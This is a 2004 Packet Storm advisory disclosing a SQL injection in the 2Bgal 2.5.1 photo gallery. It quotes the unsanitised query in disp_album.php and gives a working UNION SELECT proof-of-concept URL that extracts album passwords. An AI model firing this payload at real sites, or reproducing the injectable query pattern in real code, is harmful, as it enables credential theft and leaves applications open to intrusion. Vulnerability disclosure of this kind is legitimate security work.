2bgalSQL.txt

2004-12-31T00:00:00
ID PACKETSTORM:35481
Type packetstorm
Reporter Romain Le Guen
Modified 2004-12-31T00:00:00

Description

                                        
                                            `  
  
2Bgal 2.5.1 SQL injection Vulnerability  
(http://www.ben3w.com/)  
12/22/2004  
----------------------------------------------------------------------  
Description:  
----------------------------------------------------------------------  
2Bgal is fully customizable photo gallery.   
It's seems to be vulnerable at a SQL injection.  
  
  
----------------------------------------------------------------------  
Vulnerable code (disp_album.php(~53) and maybe disp_img.php)  
----------------------------------------------------------------------  
$chaine="SELECT nom,idpere FROM ".$tbl_alist." WHERE id=".$id_album;  
$request = MYSQL_QUERY($chaine);  
$nom_currentalbum = mysql_result($request,0,"nom");  
$idpere_currentalbum = mysql_result($request,0,"idpere");  
  
  
  
----------------------------------------------------------------------  
Proof of concept (2Bgal with MySQL 4.x.x):  
----------------------------------------------------------------------  
http://www.server.com/2bgal/disp_album.php?id_album=2%20UNION%20SELECT%20passwd%20as%20nom,%20idpere%20FROM%20galbumlist%20LIMIT%201; --  
  
This code allows you to get password for the first album.  
You can play with SQL injection code to get others passwords.  
  
----------------------------------------------------------------------  
Version   
----------------------------------------------------------------------  
2Bgal 2.5.1  
2Bgal 2.4 (seems to be affected too)  
others not tested  
  
----------------------------------------------------------------------  
Discovered by Romain Le Guen:   
http://coding.romainl.com  
contact @AT@ romainl.com   
`